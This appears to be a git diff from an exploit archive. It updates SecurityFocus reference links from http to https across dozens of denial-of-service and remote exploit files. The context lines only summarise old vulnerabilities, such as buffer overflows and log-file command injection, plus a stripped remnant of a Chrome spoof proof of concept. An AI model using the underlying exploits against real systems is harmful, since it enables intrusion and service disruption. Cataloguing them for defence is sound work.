b/exploits/multiple/dos/33080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35677/info +source: https://www.securityfocus.com/bid/35677/info Oracle Database is prone to a remote heap memory-corruption vulnerability in Network Foundation. diff --git a/exploits/multiple/dos/33083.txt b/exploits/multiple/dos/33083.txt index 81d38d973..a35066c13 100644 --- a/exploits/multiple/dos/33083.txt +++ b/exploits/multiple/dos/33083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35683/info +source: https://www.securityfocus.com/bid/35683/info Oracle Database is prone to a remote vulnerability affecting the 'Listener' component. diff --git a/exploits/multiple/dos/33086.txt b/exploits/multiple/dos/33086.txt index 2a2ce495f..3126f11d3 100644 --- a/exploits/multiple/dos/33086.txt +++ b/exploits/multiple/dos/33086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35703/info +source: https://www.securityfocus.com/bid/35703/info America's Army is prone to a remote denial-of-service vulnerability because the application fails to properly handle invalid queries. diff --git a/exploits/multiple/dos/33096.txt b/exploits/multiple/dos/33096.txt index d48dd9cb9..55dda3efe 100644 --- a/exploits/multiple/dos/33096.txt +++ b/exploits/multiple/dos/33096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35735/info +source: https://www.securityfocus.com/bid/35735/info Crysis is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33099.txt b/exploits/multiple/dos/33099.txt index fbc9162e3..5ba13f776 100644 --- a/exploits/multiple/dos/33099.txt +++ b/exploits/multiple/dos/33099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35751/info +source: https://www.securityfocus.com/bid/35751/info World in Conflict is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33100.txt b/exploits/multiple/dos/33100.txt index 16b43e92b..bb579bdd5 100644 --- a/exploits/multiple/dos/33100.txt +++ b/exploits/multiple/dos/33100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35762/info +source: https://www.securityfocus.com/bid/35762/info S.T.A.L.K.E.R. Clear Sky is prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames. diff --git a/exploits/multiple/dos/33104.txt b/exploits/multiple/dos/33104.txt index 7440c296e..7189d7c68 100644 --- a/exploits/multiple/dos/33104.txt +++ b/exploits/multiple/dos/33104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35806/info +source: https://www.securityfocus.com/bid/35806/info Star Wars Battlefront II is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33105.txt b/exploits/multiple/dos/33105.txt index a9a772670..27818a1c7 100644 --- a/exploits/multiple/dos/33105.txt +++ b/exploits/multiple/dos/33105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35807/info +source: https://www.securityfocus.com/bid/35807/info TrackMania is prone to multiple vulnerabilities. diff --git a/exploits/multiple/dos/33133.txt b/exploits/multiple/dos/33133.txt index dc274e031..1b5dc0cd6 100644 --- a/exploits/multiple/dos/33133.txt +++ b/exploits/multiple/dos/33133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35902/info +source: https://www.securityfocus.com/bid/35902/info Adobe Flash Player and Adobe AIR are prone to a heap-based buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/33182.txt b/exploits/multiple/dos/33182.txt index 12756bae8..60595d788 100644 --- a/exploits/multiple/dos/33182.txt +++ b/exploits/multiple/dos/33182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36114/info +source: https://www.securityfocus.com/bid/36114/info Live For Speed S2 is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions. diff --git a/exploits/multiple/dos/33472.py b/exploits/multiple/dos/33472.py index d6ecd4d81..d29b488d4 100755 --- a/exploits/multiple/dos/33472.py +++ b/exploits/multiple/dos/33472.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37648/info +source: https://www.securityfocus.com/bid/37648/info Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/33483.py b/exploits/multiple/dos/33483.py index 13a451a91..6e9b62470 100755 --- a/exploits/multiple/dos/33483.py +++ b/exploits/multiple/dos/33483.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37699/info +source: https://www.securityfocus.com/bid/37699/info Sun Java System Directory Server is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33506.py b/exploits/multiple/dos/33506.py index 57356f00c..f91e800ab 100755 --- a/exploits/multiple/dos/33506.py +++ b/exploits/multiple/dos/33506.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37728/info +source: https://www.securityfocus.com/bid/37728/info Oracle Database is prone to a remote memory-corruption vulnerability in Listener. diff --git a/exploits/multiple/dos/33531.py b/exploits/multiple/dos/33531.py index 4a9f65960..d3ab9edd6 100755 --- a/exploits/multiple/dos/33531.py +++ b/exploits/multiple/dos/33531.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37829/info +source: https://www.securityfocus.com/bid/37829/info Zeus Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/33532.txt b/exploits/multiple/dos/33532.txt index 0f09694cd..d2e07f174 100644 --- a/exploits/multiple/dos/33532.txt +++ b/exploits/multiple/dos/33532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37833/info +source: https://www.securityfocus.com/bid/37833/info Oracle Internet Directory is prone to a remote memory-corruption vulnerability. diff --git a/exploits/multiple/dos/33559.txt b/exploits/multiple/dos/33559.txt index 6ef0f07ba..4a4830757 100644 --- a/exploits/multiple/dos/33559.txt +++ b/exploits/multiple/dos/33559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37909/info +source: https://www.securityfocus.com/bid/37909/info Sun Java System Web Server is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33560.txt b/exploits/multiple/dos/33560.txt index bb8380cc4..6c011b87e 100644 --- a/exploits/multiple/dos/33560.txt +++ b/exploits/multiple/dos/33560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37910/info +source: https://www.securityfocus.com/bid/37910/info Sun Java System Web Server is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. The issue affects the WebDAV functionality. diff --git a/exploits/multiple/dos/33579.txt b/exploits/multiple/dos/33579.txt index 5b813cc71..e1956d6c4 100644 --- a/exploits/multiple/dos/33579.txt +++ b/exploits/multiple/dos/33579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38001/info +source: https://www.securityfocus.com/bid/38001/info Ingres Database is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/dos/33584.txt b/exploits/multiple/dos/33584.txt index 79265ef0e..9d1afe401 100644 --- a/exploits/multiple/dos/33584.txt +++ b/exploits/multiple/dos/33584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38018/info +source: https://www.securityfocus.com/bid/38018/info IBM DB2 is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33607.html b/exploits/multiple/dos/33607.html index 2cea9206a..223cf35b5 100644 --- a/exploits/multiple/dos/33607.html +++ b/exploits/multiple/dos/33607.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38132/info +source: https://www.securityfocus.com/bid/38132/info Mozilla Firefox and SeaMonkey are prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/33729.txt b/exploits/multiple/dos/33729.txt index 4d7ab3cf4..016eebbed 100644 --- a/exploits/multiple/dos/33729.txt +++ b/exploits/multiple/dos/33729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38619/info +source: https://www.securityfocus.com/bid/38619/info PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations. diff --git a/exploits/multiple/dos/33735.txt b/exploits/multiple/dos/33735.txt index b8e38d7eb..af36692a3 100644 --- a/exploits/multiple/dos/33735.txt +++ b/exploits/multiple/dos/33735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38645/info +source: https://www.securityfocus.com/bid/38645/info SUPERAntiSpyware and Super Ad Blocker are prone to multiple local vulnerabilities, including: diff --git a/exploits/multiple/dos/33800.html b/exploits/multiple/dos/33800.html index 382705df5..58a0c7815 100644 --- a/exploits/multiple/dos/33800.html +++ b/exploits/multiple/dos/33800.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38943/info +source: https://www.securityfocus.com/bid/38943/info Mozilla Firefox is prone to a remote memory-corruption vulnerability. diff --git a/exploits/multiple/dos/33876.c b/exploits/multiple/dos/33876.c index 115f11db7..46b3520ac 100644 --- a/exploits/multiple/dos/33876.c +++ b/exploits/multiple/dos/33876.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39693/info +// source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. diff --git a/exploits/multiple/dos/33879.c b/exploits/multiple/dos/33879.c index df15bb41b..dc92ce2db 100644 --- a/exploits/multiple/dos/33879.c +++ b/exploits/multiple/dos/33879.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39693/info +// source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. diff --git a/exploits/multiple/dos/34058.txt b/exploits/multiple/dos/34058.txt index 4a4479a64..0442dcacf 100644 --- a/exploits/multiple/dos/34058.txt +++ b/exploits/multiple/dos/34058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40460/info +source: https://www.securityfocus.com/bid/40460/info DM Database Server is a database application. diff --git a/exploits/multiple/dos/34248.txt b/exploits/multiple/dos/34248.txt index a2df23701..c8ccc9cb1 100644 --- a/exploits/multiple/dos/34248.txt +++ b/exploits/multiple/dos/34248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41342/info +source: https://www.securityfocus.com/bid/41342/info EDItran Communications Platform (editcp) is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer. diff --git a/exploits/multiple/dos/34261.txt b/exploits/multiple/dos/34261.txt index c1a74321c..96e642556 100644 --- a/exploits/multiple/dos/34261.txt +++ b/exploits/multiple/dos/34261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41424/info +source: https://www.securityfocus.com/bid/41424/info Unreal Engine is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer. diff --git a/exploits/multiple/dos/34270.txt b/exploits/multiple/dos/34270.txt index 15d24a6ed..d78e97f1b 100644 --- a/exploits/multiple/dos/34270.txt +++ b/exploits/multiple/dos/34270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41459/info +source: https://www.securityfocus.com/bid/41459/info Ghost Recon Advanced Warfighter (GRAW) is prone to an integer-overflow vulnerability and an array-indexing-overflow vulnerability. diff --git a/exploits/multiple/dos/34340.txt b/exploits/multiple/dos/34340.txt index 488347b88..c5e63b788 100644 --- a/exploits/multiple/dos/34340.txt +++ b/exploits/multiple/dos/34340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41737/info +source: https://www.securityfocus.com/bid/41737/info Unreal Engine is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/34360.txt b/exploits/multiple/dos/34360.txt index 61f7f9bdb..7973f800e 100644 --- a/exploits/multiple/dos/34360.txt +++ b/exploits/multiple/dos/34360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41851/info +source: https://www.securityfocus.com/bid/41851/info Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability. diff --git a/exploits/multiple/dos/34457.txt b/exploits/multiple/dos/34457.txt index 087c547c4..7bc50cc00 100644 --- a/exploits/multiple/dos/34457.txt +++ b/exploits/multiple/dos/34457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42428/info +source: https://www.securityfocus.com/bid/42428/info Sniper Elite is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error. diff --git a/exploits/multiple/dos/34528.py b/exploits/multiple/dos/34528.py index a29666454..0a53d8335 100755 --- a/exploits/multiple/dos/34528.py +++ b/exploits/multiple/dos/34528.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42701/info +source: https://www.securityfocus.com/bid/42701/info Adobe Acrobat and Reader are prone to a remote memory-corruption vulnerability. diff --git a/exploits/multiple/dos/35086.rb b/exploits/multiple/dos/35086.rb index 9b4057cb7..3f7d93fb3 100755 --- a/exploits/multiple/dos/35086.rb +++ b/exploits/multiple/dos/35086.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45309/info +source: https://www.securityfocus.com/bid/45309/info Allegro RomPager is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35304.txt b/exploits/multiple/dos/35304.txt index 97b1f5e8f..f1572fd7e 100644 --- a/exploits/multiple/dos/35304.txt +++ b/exploits/multiple/dos/35304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46091/info +source: https://www.securityfocus.com/bid/46091/info Oracle Java is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35369.txt b/exploits/multiple/dos/35369.txt index 650f77e6b..2ad3bc970 100644 --- a/exploits/multiple/dos/35369.txt +++ b/exploits/multiple/dos/35369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46478/info +source: https://www.securityfocus.com/bid/46478/info Battlefield 2 and 2142 are prone to a remote denial-of-service vulnerability due to a NULL-pointer dereference condition. diff --git a/exploits/multiple/dos/35437.pl b/exploits/multiple/dos/35437.pl index 14dd4c1d7..b77812839 100755 --- a/exploits/multiple/dos/35437.pl +++ b/exploits/multiple/dos/35437.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46827/info +source: https://www.securityfocus.com/bid/46827/info Air Contacts Lite is prone a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35465.pl b/exploits/multiple/dos/35465.pl index 8d4cf6c7b..6b0f14ca9 100755 --- a/exploits/multiple/dos/35465.pl +++ b/exploits/multiple/dos/35465.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46868/info +source: https://www.securityfocus.com/bid/46868/info VLC Media Player is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35489.pl b/exploits/multiple/dos/35489.pl index e9e6a10e0..ae8d86541 100755 --- a/exploits/multiple/dos/35489.pl +++ b/exploits/multiple/dos/35489.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47006/info +source: https://www.securityfocus.com/bid/47006/info Perl is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35613.py b/exploits/multiple/dos/35613.py index 059cd16bc..8de7cf206 100755 --- a/exploits/multiple/dos/35613.py +++ b/exploits/multiple/dos/35613.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47342/info +source: https://www.securityfocus.com/bid/47342/info TOTVS ERP Microsiga Protheus is prone to a denial-of-service vulnerability due to a memory-corruption issue. diff --git a/exploits/multiple/dos/35725.pl b/exploits/multiple/dos/35725.pl index 3da0ab9d6..1bb0ba899 100755 --- a/exploits/multiple/dos/35725.pl +++ b/exploits/multiple/dos/35725.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47766/info +source: https://www.securityfocus.com/bid/47766/info Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. diff --git a/exploits/multiple/dos/35753.pl b/exploits/multiple/dos/35753.pl index 97d51e998..685d70385 100755 --- a/exploits/multiple/dos/35753.pl +++ b/exploits/multiple/dos/35753.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47858/info +source: https://www.securityfocus.com/bid/47858/info Novell eDirectory and Netware are prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/35856.html b/exploits/multiple/dos/35856.html index 19a1a0e58..91dfab5f0 100644 --- a/exploits/multiple/dos/35856.html +++ b/exploits/multiple/dos/35856.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48262/info +source: https://www.securityfocus.com/bid/48262/info The Opera Web Browser is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36007.txt b/exploits/multiple/dos/36007.txt index 779b3a2df..835331fd7 100644 --- a/exploits/multiple/dos/36007.txt +++ b/exploits/multiple/dos/36007.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48955/info +source: https://www.securityfocus.com/bid/48955/info AzeoTech DAQFactory is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36037.txt b/exploits/multiple/dos/36037.txt index d77807894..4b080250e 100644 --- a/exploits/multiple/dos/36037.txt +++ b/exploits/multiple/dos/36037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49103/info +source: https://www.securityfocus.com/bid/49103/info The Adobe Flash Media Server is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36198.pl b/exploits/multiple/dos/36198.pl index a9dec8c9d..ad46c64aa 100755 --- a/exploits/multiple/dos/36198.pl +++ b/exploits/multiple/dos/36198.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49908/info +source: https://www.securityfocus.com/bid/49908/info Polipo is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36234.txt b/exploits/multiple/dos/36234.txt index f3770305f..1aaa573e2 100644 --- a/exploits/multiple/dos/36234.txt +++ b/exploits/multiple/dos/36234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50108/info +source: https://www.securityfocus.com/bid/50108/info G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36247.txt b/exploits/multiple/dos/36247.txt index 514f2f4b3..6ca150f6f 100644 --- a/exploits/multiple/dos/36247.txt +++ b/exploits/multiple/dos/36247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50298/info +source: https://www.securityfocus.com/bid/50298/info Splunk is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/36288.php b/exploits/multiple/dos/36288.php index 7be68aae0..bca9e2c36 100644 --- a/exploits/multiple/dos/36288.php +++ b/exploits/multiple/dos/36288.php @@ -1,6 +1,6 @@

Chrome about:blank Spoof

This vulnerability is based on http://www.securityfocus.com/bid/35829/ and http://www.securityfocus.com/bid/35803 by Juan Pablo Lopez Yacubian and Michael Wood.

<

test Spoof !!

\ No newline at end of file +

Chrome about:blank Spoof

This vulnerability is based on https://www.securityfocus.com/bid/35829/ and https://www.securityfocus.com/bid/35803 by Juan Pablo Lopez Yacubian and Michael Wood.

<

test Spoof !!

\ No newline at end of file diff --git a/exploits/multiple/remote/33124.txt b/exploits/multiple/remote/33124.txt index c1b65cb0a..97fa0a4e8 100644 --- a/exploits/multiple/remote/33124.txt +++ b/exploits/multiple/remote/33124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35841/info +source: https://www.securityfocus.com/bid/35841/info Google Chrome is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33164.txt b/exploits/multiple/remote/33164.txt index 90ddaef7e..c97d5559f 100644 --- a/exploits/multiple/remote/33164.txt +++ b/exploits/multiple/remote/33164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36023/info +source: https://www.securityfocus.com/bid/36023/info WebKit is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/multiple/remote/33192.php b/exploits/multiple/remote/33192.php index 356a427ee..417b63b73 100644 --- a/exploits/multiple/remote/33192.php +++ b/exploits/multiple/remote/33192.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36185/info +source: https://www.securityfocus.com/bid/36185/info Google Chrome is prone to security vulnerability that may allow the application to generate weak random numbers. diff --git a/exploits/multiple/remote/33203.txt b/exploits/multiple/remote/33203.txt index 700b4beb0..8b807a284 100644 --- a/exploits/multiple/remote/33203.txt +++ b/exploits/multiple/remote/33203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36209/info +source: https://www.securityfocus.com/bid/36209/info GreenSQL Firewall is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/33210.txt b/exploits/multiple/remote/33210.txt index bcbbcbdb3..a912c5558 100644 --- a/exploits/multiple/remote/33210.txt +++ b/exploits/multiple/remote/33210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36253/info +source: https://www.securityfocus.com/bid/36253/info HP Operations Manager is prone to a remote security vulnerability. diff --git a/exploits/multiple/remote/33211.txt b/exploits/multiple/remote/33211.txt index 0fae11642..a77e81eb7 100644 --- a/exploits/multiple/remote/33211.txt +++ b/exploits/multiple/remote/33211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36258/info +source: https://www.securityfocus.com/bid/36258/info HP Operations Dashboard is prone to a remote security vulnerability. diff --git a/exploits/multiple/remote/33215.txt b/exploits/multiple/remote/33215.txt index cd4028e18..bb37d19cd 100644 --- a/exploits/multiple/remote/33215.txt +++ b/exploits/multiple/remote/33215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36293/info +source: https://www.securityfocus.com/bid/36293/info IBM Tivoli Identity Manager is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/33310.nse b/exploits/multiple/remote/33310.nse index 5320f3dc1..1ce4db681 100644 --- a/exploits/multiple/remote/33310.nse +++ b/exploits/multiple/remote/33310.nse @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36842/info +source: https://www.securityfocus.com/bid/36842/info VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/multiple/remote/33316.java b/exploits/multiple/remote/33316.java index 22cc6fe0d..56d05697b 100644 --- a/exploits/multiple/remote/33316.java +++ b/exploits/multiple/remote/33316.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36881/info +source: https://www.securityfocus.com/bid/36881/info Sun has released updates to address multiple security vulnerabilities in Java SE. diff --git a/exploits/multiple/remote/33363.txt b/exploits/multiple/remote/33363.txt index b52d8c933..ba0b6015d 100644 --- a/exploits/multiple/remote/33363.txt +++ b/exploits/multiple/remote/33363.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37078/info +source: https://www.securityfocus.com/bid/37078/info Opera Web Browser is prone to a remote code-execution vulnerability. diff --git a/exploits/multiple/remote/33379.txt b/exploits/multiple/remote/33379.txt index e0e87c30c..fa9907bab 100644 --- a/exploits/multiple/remote/33379.txt +++ b/exploits/multiple/remote/33379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37149/info +source: https://www.securityfocus.com/bid/37149/info Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33399.txt b/exploits/multiple/remote/33399.txt index 62e66892e..c9514e320 100644 --- a/exploits/multiple/remote/33399.txt +++ b/exploits/multiple/remote/33399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37305/info +source: https://www.securityfocus.com/bid/37305/info Oracle E-Business Suite is prone to multiple authentication-bypass and HTML-injection vulnerabilities. diff --git a/exploits/multiple/remote/33405.txt b/exploits/multiple/remote/33405.txt index 734361f76..ccd9a85f4 100644 --- a/exploits/multiple/remote/33405.txt +++ b/exploits/multiple/remote/33405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37338/info +source: https://www.securityfocus.com/bid/37338/info The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/33489.txt b/exploits/multiple/remote/33489.txt index 211835033..81a3576c5 100644 --- a/exploits/multiple/remote/33489.txt +++ b/exploits/multiple/remote/33489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37710/info +source: https://www.securityfocus.com/bid/37710/info Ruby WEBrick is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in log files. diff --git a/exploits/multiple/remote/33490.txt b/exploits/multiple/remote/33490.txt index 0476b840f..1f424d055 100644 --- a/exploits/multiple/remote/33490.txt +++ b/exploits/multiple/remote/33490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37711/info +source: https://www.securityfocus.com/bid/37711/info The 'nginx' program is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in log files. diff --git a/exploits/multiple/remote/33497.txt b/exploits/multiple/remote/33497.txt index 76e4daff4..b99942a32 100644 --- a/exploits/multiple/remote/33497.txt +++ b/exploits/multiple/remote/33497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37712/info +source: https://www.securityfocus.com/bid/37712/info AOLServer is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33498.txt b/exploits/multiple/remote/33498.txt index 87f6a3bb7..977aa808a 100644 --- a/exploits/multiple/remote/33498.txt +++ b/exploits/multiple/remote/33498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37713/info +source: https://www.securityfocus.com/bid/37713/info Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33499.txt b/exploits/multiple/remote/33499.txt index c19c0ee8c..8f5de23c5 100644 --- a/exploits/multiple/remote/33499.txt +++ b/exploits/multiple/remote/33499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37714/info +source: https://www.securityfocus.com/bid/37714/info Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33500.txt b/exploits/multiple/remote/33500.txt index 2eb2d5148..d8b2acc92 100644 --- a/exploits/multiple/remote/33500.txt +++ b/exploits/multiple/remote/33500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37714/info +source: https://www.securityfocus.com/bid/37714/info Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33503.txt b/exploits/multiple/remote/33503.txt index 3930a9498..860e54279 100644 --- a/exploits/multiple/remote/33503.txt +++ b/exploits/multiple/remote/33503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37717/info +source: https://www.securityfocus.com/bid/37717/info Orion Application Server is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33504.txt b/exploits/multiple/remote/33504.txt index 0998fc858..ed9ed404d 100644 --- a/exploits/multiple/remote/33504.txt +++ b/exploits/multiple/remote/33504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37718/info +source: https://www.securityfocus.com/bid/37718/info Boa Webserver is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. diff --git a/exploits/multiple/remote/33536.txt b/exploits/multiple/remote/33536.txt index 31d940d10..94960a641 100644 --- a/exploits/multiple/remote/33536.txt +++ b/exploits/multiple/remote/33536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37843/info +source: https://www.securityfocus.com/bid/37843/info Zenoss is prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/multiple/remote/33553.txt b/exploits/multiple/remote/33553.txt index 9763b57bf..ce8aadd73 100644 --- a/exploits/multiple/remote/33553.txt +++ b/exploits/multiple/remote/33553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37896/info +source: https://www.securityfocus.com/bid/37896/info Sun Java System Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/multiple/remote/33562.html b/exploits/multiple/remote/33562.html index b0254a392..e9df83b31 100644 --- a/exploits/multiple/remote/33562.html +++ b/exploits/multiple/remote/33562.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37917/info +source: https://www.securityfocus.com/bid/37917/info Google Chrome is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33569.txt b/exploits/multiple/remote/33569.txt index 30aad2d44..2a4d84c13 100644 --- a/exploits/multiple/remote/33569.txt +++ b/exploits/multiple/remote/33569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37968/info +source: https://www.securityfocus.com/bid/37968/info HP System Management Homepage, also known as Systems Insight Manager, is prone to a cross-site scripting vulnerability. diff --git a/exploits/multiple/remote/33570.txt b/exploits/multiple/remote/33570.txt index 0daa27ccd..8655d0f4c 100644 --- a/exploits/multiple/remote/33570.txt +++ b/exploits/multiple/remote/33570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37972/info +source: https://www.securityfocus.com/bid/37972/info SAP BusinessObjects is prone to multiple URI-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/33577.txt b/exploits/multiple/remote/33577.txt index 49ca3f8a2..c54bc5e23 100644 --- a/exploits/multiple/remote/33577.txt +++ b/exploits/multiple/remote/33577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37997/info +source: https://www.securityfocus.com/bid/37997/info XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff 